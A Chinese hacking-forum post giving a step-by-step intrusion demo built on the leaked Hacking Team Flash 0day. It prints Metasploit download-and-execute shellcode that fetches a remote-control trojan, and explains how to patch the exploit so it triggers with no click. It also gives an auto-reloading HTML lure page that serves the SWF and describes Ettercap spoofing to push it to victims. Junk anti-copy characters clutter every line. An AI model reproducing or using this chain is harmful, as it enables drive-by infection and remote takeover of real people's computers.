找回密码
 立即注册
查看: 2359|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 O2 ?3 G4 g4 K, D% } 三、flash 0day之手工代码修改制作下载者实例入侵演示 9 M. n& M8 ?/ V. |$ r! P5 _

1 s$ g- @7 w7 O% O" @

% O8 C7 s: l6 u) a 利用到的工具: 2 C1 ?2 f- w. b3 X

) {* |. H2 Z0 G" H* F d! J

9 \ |; g; C4 R( |6 |# q Msf ) V- V* U$ R; W# u1 [0 g5 K

0 C; R' L& ?( S4 z

$ Z j7 l6 ]0 @# Z! |7 g" V Ettercap 8 V5 o8 [" |' A" b a' w! e. X' Y

; X$ y9 ]4 x2 Y b0 @

. ]' W- O: X1 r; y7 k2 | Adobe Flash CS6 % @9 M; ]& H2 L) |+ W' J

1 k) @, v# u( b; I

, G- o7 K+ M9 h, L8 m Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 % e# `; L2 d2 x, w6 f

/ G0 _ x" ~7 L$ W/ }7 ~8 I. v

8 l' v+ u9 H2 w 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 0 O3 I! P W0 E6 q

+ ^/ E' z, s- a% S

8 _; X6 _/ L5 a1 ]) t5 P, R 如图: 5 Q6 H& u) [: o' G) E" a- p q: e

! D# y, B& h$ ]6 @" w

) P! S' G" c/ a   - l4 `. x; B7 d$ ]

) T- L7 X) s u+ h- E

5 U' d" ~9 b+ a6 z3 V5 u5 ~   , G. R# P- N- [) i. {

5 D# e& o+ [* I! C4 X9 K9 ^! e

* R/ d' d4 v8 _$ U* o& X 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: - z, a+ h4 Z4 O

5 s3 O$ O, A( _7 B3 [8 b4 }$ \" t

' Y( l% l2 B4 Y6 J V   / G9 ]6 Q# G) a" ?8 ?% X

- G3 b4 ?% j+ j- e O

% K+ W. l8 c) a' L   & n" V1 a: r2 o) w( r0 j3 p& [

) ~$ ?9 H( V4 I1 C5 L( k) I

6 f8 ]5 E0 R( q/ v( C9 M6 S1 q 然后执行generate -t dword生成shellcode,如下: ( \ @" e Y2 z) x& k

/ `: S/ V: @; J" n4 p$ \4 `1 e

) `6 n8 e$ w+ O/ d7 F4 `) [5 Z* L   1 e- b+ g+ o, l Q/ R9 z

t, L j0 b, Y/ B3 u

+ Z7 X; V1 z4 ]' q4 Q1 U" S+ a 复制代码到文本下便于我们一会编辑flash exp,如下: $ Y# I1 ^* S4 y9 T0 a$ W+ _

! t% ^, ?# S- X& E/ v9 |4 P

! g7 k& T) ~4 l 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 1 c5 J6 d0 S+ J' g. G

6 V% [" G5 q/ U) Z! V9 _

) ^: u1 E: k/ J |/ L2 C$ q 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 K6 v, Y9 V; S( f' c

( N" Q4 V9 [: ^5 E; m6 Q

5 Q$ j1 t* F/ z% Z: D: |: C 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 2 K: q; _7 {+ T! m* Z3 q# Q

1 k. U2 C3 x4 N# h0 F3 d

9 D$ N" L5 s4 y2 s! g2 p 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 R* J+ r9 P# p+ B: C

+ z6 }! Y% Y6 E' b: |1 b0 i; X

; B& ]+ _. s: b% D2 l7 q) A 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 5 d% q9 B0 g- d' K0 @( V

3 A6 T4 q x5 I U, c0 g

- ?* e( \3 U1 o) \1 D H* c! Z 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 7 ^& t8 ?2 Y# S) i/ |: Q, _( R. }9 m

. n! Y$ ?4 p( P

" [- Z& `0 q* ^2 w 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, , E& [2 k5 }4 x3 q8 `9 t m7 x

& y; ?& ^6 N4 X, Z7 a& Z) ~

! M+ }0 B& `% Q3 ]; u* v 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 2 f# h- [2 a0 a7 M

" s2 V0 E X+ F; \% _

# ^2 C, K$ _1 W8 O3 P, Q; M. } 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, : U/ { u! F! n2 u3 h# E* o

, L% u$ R) R- K3 g1 |$ b

1 `4 L3 x: }+ H, D' M& r& Q 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, - ^: o x7 m7 W# }: O+ h

+ e/ h9 j5 x& V8 s: G* D- r( e

& ?2 q# _, Y {. m1 I8 t( ` 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ; ~- w- ^' c- u7 Y6 W. J

9 \8 l8 f4 O8 l% d1 l; Y

* [6 V1 Y, _( t5 r5 b; y5 D 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, @ S F9 }$ I% E

4 G7 a$ R; W- W8 @

& l* ^7 s& ^: L0 D' ` 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 2 v. \6 r' n. Z" r, p8 y8 B1 g

+ n+ W* X, M) ` E2 ]1 Q1 U

, ]. B! ^2 y" @8 [3 ?$ e 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 + [2 V0 C. Z8 l! x3 x

7 M) u, ]5 e4 ]; I- p# t. b# S6 W

b% m' [# B- |* K' A   " K; [$ l5 L1 Z! _0 X

+ x9 h5 m$ f4 d# N* y- d7 f: }( D

: [9 C" [$ s9 {, v   ; G3 }# w6 }6 ^8 q9 x4 Y% c

" U" [4 B; v$ M$ |: |

, o% p1 q3 F- K. O' l 下面我们来修改flash 0day exp,需要修改三个文件,分别为: & O9 e- [4 a- J8 P8 X; I

. j1 G$ @9 @! p( w1 {9 D* E

' b& P8 Y( `0 k( M, D0 S$ p( }   6 }7 v% j! I6 H8 X' M0 E5 B- y

, v) T/ J; s0 X; U! V

. ~9 A3 H7 Y8 q$ {5 G! ]' L% Q$ F$ Z 先修改ShellWin32.as,部分源代码如图: # w( y0 x1 p+ B/ M6 i

0 W0 z7 x) G( f, J" g0 a1 V9 H" V

1 i; g( D- {' @6 k   % \8 N! Y9 P7 D

% W7 r+ r( Z4 \- W N% W

" s7 U9 n, u8 `7 m5 h* v 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 7 q' ]& k; g: [

% W, `( ~& R2 p5 f$ g

: d7 B7 x; W9 F   & l+ O* |0 t/ o+ V2 Q

& h. U1 r2 [5 i1 O* H

0 z; P$ X3 N; t J% h4 \$ X" i( D 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: # n% Z" U8 E& N, J# D1 z

4 e1 j6 p2 Z) D! V) f H9 O

9 [, ]6 R& K; I, U   8 J t& ~. y+ d/ m; C6 }

) o% V( Y( u1 }" T0 b9 s

* `% T8 G2 P# x6 { 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 1 R1 h3 {& _' J* J, ?; L4 M6 D. k, \

+ P9 A$ a4 k" E

. e& P! S* c8 g7 f0 Y   ) e4 x1 |0 @' b) [# a/ p) q+ q

z% r$ V) {+ I6 i5 p) v. i

; i( ^" @7 j0 q3 U$ ^6 u8 p$ \   9 I v* s- v9 G

5 y% g0 Z1 I3 L% P) G

5 K- r( t2 E- H5 h% c. s# k& M   ) @! Q0 w9 k% g( {. y2 S( O

/ s9 ^3 |1 l2 y, Z# U! q9 F7 C" P

3 x, ]7 m1 c, {8 f4 w- O 然后点保存,下面我们来编译一下,打开 + T* v6 B5 R ]& v

! P4 T( C. `( r4 \5 S: K1 U6 {

4 Q: H% y, r. X exp1.fla然后点文件-发布,看看编译没错误 ' t2 z0 t' ~2 c

7 @9 P* e( s, G- J

: F( O; G( [3 O' ?4 M$ N   * E3 p% q" o! S6 ]! r4 h8 u; H3 s

+ ^0 E; E5 v" O/ c

7 Y& F/ f8 k- D4 u9 k   % j( I4 k" F! i1 F8 k" h& `9 D

4 S! z# ~, S) W8 D4 U* n

9 E4 Y ^% T& _) C   ) R. m5 [/ z* L3 V2 `/ c. Q

3 {0 `+ m4 O2 V

* Y+ J, t/ a9 g5 |   3 R6 s/ i- ^: C- ?1 @' W4 A

- \$ d% f& D6 m& D

" \* E v# h! _$ ~. v/ Y 然后我们把生成的 7 {8 A. z4 s- O. z7 g3 P

A! i5 C9 t( K7 |6 {" i. z

# i; h! F B2 [# s) h exp1.swf丢到kailinux /var/www/html下: * \$ X6 d9 Z: @& ~5 K' g8 t

& P8 F: l$ A+ b( ?7 L% z$ J

9 n; D9 `& ^4 m 然后把这段代码好好编辑一下 0 D1 ?# y6 }3 H9 m

' A# x6 C Z5 b2 r$ c( S7 \/ X( W

! `# u8 r. O& q7 f* ]   * ~8 `" f1 H* b2 I& Z: [: ~$ V& y

r0 w1 }* ?. h v n

; v; C! z- M/ {3 z   ' g j+ H- d( ]/ V) x5 k

2 C4 O) w: d8 {' Z3 |/ A' E

- E" d# L4 a2 |7 P   V/ z4 f9 \; p L6 l

) N+ L; k" L5 q: R C4 I% l: M

( p {. S; u* s% U: p4 e/ Z   1 I' }. y' y# w

6 R& ?4 @* c1 v6 o, k1 ~7 }

/ ^' ]' w$ b Q- V: d* U, ?7 |   ' z# i T( v( X9 ^& G& c

( |0 C% j0 v7 [

# E. ?1 ~0 D; g3 [! f, a( x   - L" U! [- e) x/ N( L" T2 y

- {2 d) B. G. G$ E' O- T

; \$ L+ ]- S( T) A/ Q& ?- K <!DOCTYPE html> : I# C7 d3 f$ @- D) }4 z

) w9 b* i7 f$ H4 A. L$ m3 q

8 f" L6 t4 E% z, t* b+ v6 ] <html> 8 s3 g Z8 I o, v- P1 p4 E6 I

# c, u# f8 v! p* S

% B; q9 t6 h; U1 u: r: E# `8 ^7 O <head> - M) ^2 z5 P5 a$ j6 d: d7 k: x

. s3 L: V* x; {7 h( G

- d3 m: U# m) k* l <meta http-equiv="Content-Type" content="text/html; ) r" e( ~, k2 b/ u9 ^

- u8 Q+ ?5 i( `9 {! o. q, E9 X: t

; k+ r9 }* S& ~ charset=utf-8"/> * R3 k! w& h- p5 K

: E( {# e' @9 o$ D/ v. o

& K2 p5 C0 O: N' c$ y- @ </head> / D! `- g1 y6 d5 ~& O0 \

# j6 {3 @4 D. E/ l

' e6 |' |: m$ J <body> % ?6 k! x/ d) |+ \' U+ Y. R! ^

0 T+ Z9 m7 y1 Y" `: u6 O3 g

$ J0 y/ j H: } q <h2> Please wait, the requested page is loading...</h2> , p: J8 v% w D2 P/ R9 u0 s

" d0 A: t K" V% `1 l4 m' K1 b* H

. j' ^8 v) i- u/ p3 M+ u1 {5 V <br> , \- O a# p3 d' l

/ i* h( c0 I5 |$ G4 _; ?

! O! a* w, @ w+ z8 x- p <OBJECT 9 I+ E1 w, D$ ^% T2 c {

; T/ J! [) i- ~+ K2 y

/ T! x; D5 s9 t classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 3 l2 O! m. w9 f. }( F% m' j

/ I# y, m0 O+ }9 C. g

. W5 h7 E2 t9 f8 n6 W0 `2 ]& E VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 g. y# M* G! p: `

% v2 B8 o$ ?' j) f& @

: L' \, l2 u* a% \ </body> * E# `+ u$ o% g

* a& Z; r- R5 }$ L }" r2 e

# U% K v; d: F A2 N: s0 { <script> ( [, P6 [* Q! `% i- O j" r

6 H3 ~ |9 r# w& X' Z3 N2 g

; d$ ?% z. t4 T     setTimeout(function () { # k3 K0 H6 H+ Q0 { F

% Z; I% d5 W3 G8 O5 i% p

9 o; g7 ~0 B6 k% I$ S" w+ e; G: t          + i. n- L+ U. J. @2 `

6 _) _8 h. O1 K1 b( c

- u: R+ s, D5 e window.location.reload(); % a, i2 }8 d7 }$ m

4 {8 p1 g% d! @5 r+ M

; I& F* s/ U' N1 ?8 y     }, 10000); * Y9 H1 K/ F/ i! N n

- t. |: e! i m6 v1 i

4 `$ h# _9 @% G7 q   6 I. ^+ f" M, w

& K* q* ], J. y( z: |" ?) O! b. t

9 H" ^) H$ Z3 F; Z/ h </script> 7 E% L5 U% I( L' k! ^

9 r( i q# l& M9 n0 I

; f' j( w: }# ^9 t# n' W </html> 4 k& A$ |' p: [4 H

0 N$ W1 t) e/ A) M& f$ \3 q: C6 P

# u$ [# t* H/ d; V/ w$ U+ r2 ]2 s* V+ q   $ O9 O; | H6 z1 h/ r9 X( C1 t. [

: _- ~% E" h) v

* t5 w8 V0 P" P 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 9 P1 p* J3 Y m8 l

" |( ]" @ y( P2 _

% k8 W& i. e2 t' c   $ r8 ~2 }. J- b9 F

- P* j7 o" I E) r+ @& ]) ]

" I: c1 t3 O6 B; M2 ~* e   7 ]' C' f4 ~) k6 o% ?

6 h, U% a% ]% B4 m: Z

1 m5 O. G# y$ r8 L4 r ` ?# Z3 f   ; v% j+ n' g- q

# T5 b' L6 R+ n( o

# I: }7 E1 y# y& O# U   - A3 v5 e: e+ [, C$ Z& R6 N

1 U4 [: ~5 H) a- Z/ h2 J& y

* j1 A/ w2 z% i% K   % a5 p9 x3 X+ B' u; f* t

; H% ]0 |& c9 x/ Z; _

' A/ ^6 `5 d+ Q6 A 下面我们用ettercap欺骗如图: 2 S' r) j' h9 y7 k

- @* D6 C* w9 v; q

( b7 |; e. W, l5 m3 N8 M/ p   ; A: r1 i. [( D+ k

! h! U0 Y( b9 }( Q- l0 h. i0 q

, i% Z1 p3 a1 N( L! _4 ~   2 b3 j) y3 C6 j) g* [/ [

& t) S6 u( Q9 T, v& @% t) ?, @

# S9 O' h7 u F8 S6 e: D& r, \ 下面我们随便访问个网站看看: 7 x- m' W1 @, |2 S

" `0 H; {. Q0 X1 i

1 F: c; j4 j! G4 f7 B* A 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 9 q9 ~1 C8 H# s' @3 [# W, y

4 ~, `/ U3 ~" U/ c$ M$ ^$ ?" Z

( i3 K0 h- T$ L' B# z; q   7 N( l/ K: D% p L! Z7 l+ G

: G; i6 q: B2 I, a

2 ?. D5 p% ^4 n$ _& X 我们看另一台, ( [. J2 V2 g* f

5 R! y- {% o# Y3 V

, ?4 U P3 t1 j& Z$ u% g" F' p& [+ l4 Y/ Z 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 9 H: B- q3 E }; B1 f( ~+ S: W, t

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表